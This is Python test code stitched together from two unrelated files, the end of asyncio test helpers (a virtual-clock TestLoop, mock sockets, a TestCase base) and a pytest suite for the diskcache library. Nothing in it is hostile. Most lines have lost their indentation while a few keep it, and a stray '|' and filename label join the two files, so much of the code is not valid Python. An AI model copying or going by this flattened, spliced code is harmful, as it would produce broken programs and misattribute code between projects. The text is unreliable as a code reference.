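    with run_test_server() as httpd:
        host, port = httpd.address
        conn = http.client.HTTPConnection(host, port)
        try:
            conn.request('GET', '/')
            assert conn.getresponse().read() == b'Test message'
        finally:
            conn.close()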
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
    It manages its own time directly.
    If something is scheduled to be executed later, then on the next loop
    iteration, after all ready handlers are done, the generator passed to
    __init__ is advanced.
    The generator should look like this:
        def gen():
            ...
            when = yield ...
            ... = yield time_advance
    Inside the generator, the value returned by yield is the absolute time of
    the next scheduled handler, and the value passed back to yield is the time
    advance used to move the loop's time forward.
    (A minimal usage sketch follows the class definition.)
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self, None)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError(f'fd {fd} is not registered')
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError(
f'unexpected callback: {handle._callback} != {callback}')
if handle._args != args:
raise AssertionError(
f'unexpected callback args: {handle._args} != {args}')
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError(f'fd {fd} is registered')
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self, None)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: "
"{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args, context=None):
self._timers.append(when)
return super().call_at(when, callback, *args, context=context)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
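# Illustrative sketch (not part of the original helpers): driving TestLoop's
# virtual clock through the generator protocol described in its docstring.
# The function name, the 0.1 s timer and the callback below are made up for
# the example.
def _example_test_loop():
    fired = []

    def gen():
        when = yield          # absolute time of the next scheduled handler
        assert when == 0.1
        yield 0.1             # advance the virtual clock so the timer fires

    loop = TestLoop(gen)

    def on_timer():
        fired.append(True)
        loop.stop()

    loop.call_at(0.1, on_timer)
    loop.run_forever()
    loop.close()
    assert fired == [True]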
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
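# Illustrative sketch (not part of the original helpers): MockPattern lets an
# assert_called_with() check match by regular expression rather than by exact
# string equality. The function name, mock and message below are made up for
# the example.
def _example_mock_pattern():
    m = mock.Mock()
    m.log('Exception in callback: division by zero')
    m.log.assert_called_with(MockPattern('Exception in callback.*zero'))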
class MockInstanceOf:
def __init__(self, type):
self._type = type
def __eq__(self, other):
return isinstance(other, self._type)
def get_function_source(func):
source = format_helpers._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
if loop._default_executor is not None:
if not loop.is_closed():
loop.run_until_complete(loop.shutdown_default_executor())
else:
loop._default_executor.shutdown(wait=True)
loop.close()
policy = support.maybe_get_event_loop_policy()
if policy is not None:
try:
watcher = policy.get_child_watcher()
except NotImplementedError:
# watcher is not implemented by EventLoopPolicy, e.g. Windows
pass
else:
if isinstance(watcher, asyncio.ThreadedChildWatcher):
threads = list(watcher._threads.values())
for thread in threads:
thread.join()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
    # PyPy modification: the commented-out lines below interfere with the fact
    # that we are not using the C accelerator module _asyncio; they were
    # removed in 3.10.
#def unpatch_get_running_loop(self):
# events._get_running_loop = self._get_running_loop
def setUp(self):
#self._get_running_loop = events._get_running_loop
#events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
#self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
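# Illustrative sketch (not part of the original helpers): while disable_logger()
# is active, records on the asyncio logger below CRITICAL+1 are dropped. The
# function name and message below are made up for the example.
def _example_disable_logger():
    with disable_logger():
        logger.warning('this asyncio warning is suppressed inside the context')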
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
|
test_core.py
|
"Test diskcache.core.Cache."
import collections as co
import errno
import functools as ft
import hashlib
import io
import os
import os.path as op
import pickle
import pytest
import random
import shutil
import sqlite3
import subprocess as sp
import sys
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
import diskcache as dc
pytestmark = pytest.mark.filterwarnings('ignore', category=dc.EmptyDirWarning)
@pytest.fixture
def cache():
with dc.Cache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
for key, value in dc.DEFAULT_SETTINGS.items():
assert getattr(cache, key) == value
cache.check()
cache.close()
cache.close()
def test_init_disk():
with dc.Cache(disk_pickle_protocol=1, disk_min_file_size=2 ** 20) as cache:
key = (None, 0, 'abc')
cache[key] = 0
cache.check()
assert cache.disk_min_file_size == 2 ** 20
assert cache.disk_pickle_protocol == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_reset():
with dc.Cache(disk_min_file_size=0, disk_pickle_protocol=0) as cache:
value = (None, 0, 'abc')
cache[0] = value
cache.check()
assert cache.disk_min_file_size == 0
assert cache.disk_pickle_protocol == 0
assert cache._disk.min_file_size == 0
assert cache._disk.pickle_protocol == 0
cache.reset('disk_min_file_size', 2 ** 10)
cache.reset('disk_pickle_protocol', 2)
cache[1] = value
cache.check()
assert cache.disk_min_file_size == 2 ** 10
assert cache.disk_pickle_protocol == 2
assert cache._disk.min_file_size == 2 ** 10
assert cache._disk.pickle_protocol == 2
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_valueerror():
with pytest.raises(ValueError):
with dc.Cache(disk=dc.Disk('test')):
pass
def test_custom_disk():
with dc.Cache(disk=dc.JSONDisk, disk_compress_level=6) as cache:
values = [None, True, 0, 1.23, {}, [None] * 10000]
for value in values:
cache[value] = value
for value in values:
assert cache[value] == value
shutil.rmtree(cache.directory, ignore_errors=True)
class SHA256FilenameDisk(dc.Disk):
def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(self._directory, filename)
return filename, full_path
def test_custom_filename_disk():
with dc.Cache(disk=SHA256FilenameDisk) as cache:
for count in range(100, 200):
key = str(count).encode('ascii')
cache[key] = str(count) * int(1e5)
for count in range(100, 200):
key = str(count).encode('ascii')
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(cache.directory, filename)
with open(full_path) as reader:
content = reader.read()
assert content == str(count) * int(1e5)
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init_makedirs():
cache_dir = tempfile.mkdtemp()
shutil.rmtree(cache_dir)
makedirs = mock.Mock(side_effect=OSError(errno.EACCES))
with pytest.raises(EnvironmentError):
try:
with mock.patch('os.makedirs', makedirs):
cache = dc.Cache(cache_dir)
except EnvironmentError:
shutil.rmtree(cache_dir, ignore_errors=True)
raise
def test_pragma_error(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
cursor = mock.Mock()
fetchall = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.return_value = cursor
cursor.fetchall = fetchall
fetchall.side_effect = [sqlite3.OperationalError] * 60000
size = 2 ** 28
with mock.patch('time.sleep', lambda num: 0):
with mock.patch.object(cache, '_local', local):
with pytest.raises(sqlite3.OperationalError):
cache.reset('sqlite_mmap_size', size)
def test_close_error(cache):
class LocalTest(object):
def __init__(self):
self._calls = 0
def __getattr__(self, name):
if self._calls:
raise AttributeError
else:
self._calls += 1
return mock.Mock()
with mock.patch.object(cache, '_local', LocalTest()):
cache.close()
def test_getsetdel(cache):
values = [
(None, False),
((None,) * 2 ** 20, False),
(1234, False),
(2 ** 512, False),
(56.78, False),
(u'hello', False),
(u'hello' * 2 ** 20, False),
(b'world', False),
(b'world' * 2 ** 20, False),
(io.BytesIO(b'world' * 2 ** 20), True),
]
for key, (value, file_like) in enumerate(values):
assert cache.set(key, value, read=file_like)
assert len(cache) == len(values)
for key, (value, file_like) in enumerate(values):
if file_like:
assert cache[key] == value.getvalue()
else:
assert cache[key] == value
for key, _ in enumerate(values):
del cache[key]
assert len(cache) == 0
for value, (key, _) in enumerate(values):
cache[key] = value
assert len(cache) == len(values)
for value, (key, _) in enumerate(values):
assert cache[key] == value
for _, (key, _) in enumerate(values):
del cache[key]
assert len(cache) == 0
cache.check()
def test_get_keyerror1(cache):
with pytest.raises(KeyError):
cache[0]
def test_get_keyerror4(cache):
func = mock.Mock(side_effect=IOError(errno.ENOENT, ''))
cache.reset('statistics', True)
cache[0] = b'abcd' * 2 ** 20
with mock.patch('diskcache.core.open', func):
with pytest.raises((IOError, KeyError, OSError)):
cache[0]
def test_read(cache):
cache.set(0, b'abcd' * 2 ** 20)
with cache.read(0) as reader:
assert reader is not None
def test_read_keyerror(cache):
with pytest.raises(KeyError):
with cache.read(0) as reader:
pass
def test_set_twice(cache):
large_value = b'abcd' * 2 ** 20
cache[0] = 0
cache[0] = 1
assert cache[0] == 1
cache[0] = large_value
assert cache[0] == large_value
with cache.get(0, read=True) as reader:
assert reader.name is not None
cache[0] = 2
assert cache[0] == 2
assert cache.get(0, read=True) == 2
cache.check()
def test_set_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.set('a', 'b' * 2 ** 20)
finally:
cache.check()
def test_raw(cache):
assert cache.set(0, io.BytesIO(b'abcd'), read=True)
assert cache[0] == b'abcd'
def test_get(cache):
assert cache.get(0) is None
assert cache.get(1, 'dne') == 'dne'
assert cache.get(2, {}) == {}
assert cache.get(0, expire_time=True, tag=True) == (None, None, None)
assert cache.set(0, 0, expire=None, tag=u'number')
assert cache.get(0, expire_time=True) == (0, None)
assert cache.get(0, tag=True) == (0, u'number')
assert cache.get(0, expire_time=True, tag=True) == (0, None, u'number')
def test_get_expired_fast_path(cache):
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_fast_path(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.get(0) is None
def test_get_expired_slow_path(cache):
cache.stats(enable=True)
cache.reset('eviction_policy', 'least-recently-used')
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_slow_path(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.get(0)
def test_pop(cache):
assert cache.incr('alpha') == 1
assert cache.pop('alpha') == 1
assert cache.get('alpha') is None
assert cache.check() == []
assert cache.set('alpha', 123, expire=1, tag='blue')
assert cache.pop('alpha', tag=True) == (123, 'blue')
assert cache.set('beta', 456, expire=1e-9, tag='green')
time.sleep(0.01)
assert cache.pop('beta', 'dne') == 'dne'
assert cache.set('gamma', 789, tag='red')
assert cache.pop('gamma', expire_time=True, tag=True) == (789, None, 'red')
assert cache.pop('dne') is None
assert cache.set('delta', 210)
assert cache.pop('delta', expire_time=True) == (210, None)
assert cache.set('epsilon', '0' * 2 ** 20)
assert cache.pop('epsilon') == '0' * 2 ** 20
def test_pop_ioerror(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pop(0) is None
def test_pop_ioerror_eacces(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pop(0)
def test_delete(cache):
cache[0] = 0
assert cache.delete(0)
assert len(cache) == 0
assert not cache.delete(0)
assert len(cache.check()) == 0
def test_del(cache):
with pytest.raises(KeyError):
del cache[0]
def test_del_expired(cache):
cache.set(0, 0, expire=0.001)
time.sleep(0.01)
with pytest.raises(KeyError):
del cache[0]
def test_stats(cache):
cache[0] = 0
assert cache.stats(enable=True) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats(reset=True) == (100, 10)
assert cache.stats(enable=False) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats() == (0, 0)
assert len(cache.check()) == 0
def test_path(cache):
cache[0] = u'abc'
large_value = b'abc' * 2 ** 20
cache[1] = large_value
assert cache.get(0, read=True) == u'abc'
with cache.get(1, read=True) as reader:
assert reader.name is not None
path = reader.name
with open(path, 'rb') as reader:
value = reader.read()
assert value == large_value
assert len(cache.check()) == 0
def test_expire_rows(cache):
cache.reset('cull_limit', 0)
for value in range(10):
assert cache.set(value, value, expire=1e-9)
for value in range(10, 15):
assert cache.set(value, value)
assert len(cache) == 15
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.set(15, 15)
assert len(cache) == 6
assert len(cache.check()) == 0
def test_least_recently_stored(cache):
cache.reset('eviction_policy', u'least-recently-stored')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 2)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
for value in range(10):
assert cache[value] == million
for value in range(10, 20):
cache[value] = million
assert len(cache) == 10
for value in range(10):
cache[value] = million
count = len(cache)
for index, length in enumerate([1, 2, 3, 4]):
cache[10 + index] = million * length
assert len(cache) == count - length
assert cache[12] == million * 3
assert cache[13] == million * 4
assert len(cache.check()) == 0
def test_least_recently_used(cache):
cache.reset('eviction_policy', u'least-recently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
time.sleep(0.01)
cache[0]
cache[1]
cache[7]
cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_least_frequently_used(cache):
cache.reset('eviction_policy', u'least-frequently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
cache[0], cache[0], cache[0], cache[0], cache[0]
cache[1], cache[1], cache[1], cache[1]
cache[7], cache[7], cache[7]
cache[8], cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_filename_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
with mock.patch('os.makedirs', func):
with pytest.raises(OSError):
cache._disk.filename()
def test_remove_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
try:
with mock.patch('os.remove', func):
cache._disk.remove('ab/cd/efg.val')
except OSError:
pass
else:
if os.name == 'nt':
pass # File delete errors ignored on Windows.
else:
raise Exception('test_remove_error failed')
def test_check(cache):
blob = b'a' * 2 ** 20
keys = (0, 1, 1234, 56.78, u'hello', b'world', None)
for key in keys:
cache[key] = blob
# Cause mayhem.
with cache.get(0, read=True) as reader:
full_path = reader.name
os.rename(full_path, full_path + '_moved')
with cache.get(1, read=True) as reader:
full_path = reader.name
os.remove(full_path)
cache._sql('UPDATE Cache SET size = 0 WHERE rowid > 1')
cache.reset('count', 0)
cache.reset('size', 0)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0 # Should display no warnings.
def test_integrity_check(cache):
for value in range(1000):
cache[value] = value
cache.close()
with io.open(op.join(cache.directory, 'cache.db'), 'r+b') as writer:
writer.seek(52)
writer.write(b'\x00\x01') # Should be 0, change it.
cache = dc.Cache(cache.directory)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0
def test_expire(cache):
cache.reset('cull_limit', 0) # Disable expiring keys on `set`.
now = time.time()
time_time = mock.Mock(return_value=now)
with mock.patch('time.time', time_time):
for value in range(1, 101):
assert cache.set(value, value, expire=value)
assert len(cache) == 100
time_time = mock.Mock(return_value=now + 11)
cache.reset('cull_limit', 10)
with mock.patch('time.time', time_time):
assert cache.expire() == 10
assert len(cache) == 90
assert len(cache.check()) == 0
def test_tag_index():
with dc.Cache(tag_index=True) as cache:
assert cache.tag_index == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_clear_timeout(cache):
transact = mock.Mock()
transact.side_effect = dc.Timeout
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.clear()
def test_tag(cache):
assert cache.set(0, None, tag=u'zero')
assert cache.set(1, None, tag=1234)
assert cache.set(2, None, tag=5.67)
assert cache.set(3, None, tag=b'three')
assert cache.get(0, tag=True) == (None, u'zero')
assert cache.get(1, tag=True) == (None, 1234)
assert cache.get(2, tag=True) == (None, 5.67)
assert cache.get(3, tag=True) == (None, b'three')
def test_with(cache):
with dc.Cache(cache.directory) as tmp:
tmp[u'a'] = 0
tmp[u'b'] = 1
assert cache[u'a'] == 0
assert cache[u'b'] == 1
def test_contains(cache):
assert 0 not in cache
cache[0] = 0
assert 0 in cache
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_add(cache):
assert cache.add(1, 1)
assert cache.get(1) == 1
assert not cache.add(1, 2)
assert cache.get(1) == 1
assert cache.delete(1)
assert cache.add(1, 1, expire=0.001)
time.sleep(0.01)
assert cache.add(1, 1)
cache.check()
def test_add_large_value(cache):
value = b'abcd' * 2 ** 20
assert cache.add(b'test-key', value)
assert cache.get(b'test-key') == value
assert not cache.add(b'test-key', value * 2)
assert cache.get(b'test-key') == value
cache.check()
def test_add_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.add(0, 0)
finally:
cache.check()
def test_incr(cache):
assert cache.incr('key', default=5) == 6
assert cache.incr('key', 2) == 8
assert cache.get('key', expire_time=True, tag=True) == (8, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.incr('key') == 1
def test_incr_insert_keyerror(cache):
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_incr_update_keyerror(cache):
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_decr(cache):
assert cache.decr('key', default=5) == 4
assert cache.decr('key', 2) == 2
assert cache.get('key', expire_time=True, tag=True) == (2, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.decr('key') == -1
def test_iter(cache):
sequence = list('abcdef') + [('g',)]
for index, value in enumerate(sequence):
cache[value] = index
iterator = iter(cache)
assert all(one == two for one, two in zip(sequence, iterator))
cache['h'] = 7
with pytest.raises(StopIteration):
next(iterator)
def test_iter_expire(cache):
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
assert len(cache) == 100
assert list(cache) == list(range(100))
def test_iter_error(cache):
with pytest.raises(StopIteration):
next(iter(cache))
def test_reversed(cache):
sequence = 'abcdef'
for index, value in enumerate(sequence):
cache[value] = index
iterator = reversed(cache)
pairs = zip(reversed(sequence), iterator)
assert all(one == two for one, two in pairs)
try:
next(iterator)
except StopIteration:
pass
else:
assert False, 'StopIteration expected'
def test_reversed_error(cache):
with pytest.raises(StopIteration):
next(reversed(cache))
def test_push_pull(cache):
for value in range(10):
cache.push(value)
for value in range(10):
_, pull_value = cache.pull()
assert pull_value == value
assert len(cache) == 0
def test_push_pull_prefix(cache):
for value in range(10):
cache.push(value, prefix='key')
for value in range(10):
key, peek_value = cache.peek(prefix='key')
key, pull_value = cache.pull(prefix='key')
assert key.startswith('key')
assert peek_value == value
assert pull_value == value
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_pull_extras(cache):
cache.push('test')
assert cache.pull() == (500000000000000, 'test')
assert len(cache) == 0
cache.push('test', expire=10)
(key, value), expire_time = cache.peek(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 1
(key, value), expire_time = cache.pull(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 0
cache.push('test', tag='foo')
(key, value), tag = cache.peek(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 1
(key, value), tag = cache.pull(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 0
cache.push('test')
(key, value), expire_time, tag = cache.peek(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 1
(key, value), expire_time, tag = cache.pull(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 0
assert cache.pull(default=(0, 1)) == (0, 1)
assert len(cache.check()) == 0
def test_push_pull_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.pull() == (500000000000003, 1)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.peek() == (500000000000003, 1)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_push_pull_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.pull() == (500000000000000, value)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.peek() == (500000000000000, value)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_pull_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pull() == (None, None)
def test_peek_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 0]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peek()
assert value == 0
def test_pull_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pull()
def test_peek_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peek()
def test_peekitem_extras(cache):
with pytest.raises(KeyError):
cache.peekitem()
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2, expire=10, tag='foo')
assert cache.set('d', 3, expire=0.1)
assert cache.set('e', 4, expire=0.1)
time.sleep(0.2)
(key, value), expire_time, tag = cache.peekitem(expire_time=True, tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
(key, value), expire_time = cache.peekitem(expire_time=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
(key, value), tag = cache.peekitem(tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
def test_peekitem_ioerror(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 2]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peekitem()
assert value == 2
def test_peekitem_ioerror_eacces(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peekitem()
def test_iterkeys(cache):
assert list(cache.iterkeys()) == []
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_pragmas(cache):
results = []
def compare_pragmas():
valid = True
for key, value in dc.DEFAULT_SETTINGS.items():
if not key.startswith('sqlite_'):
continue
pragma = key[7:]
result = cache._sql('PRAGMA %s' % pragma).fetchall()
if result == [(value,)]:
continue
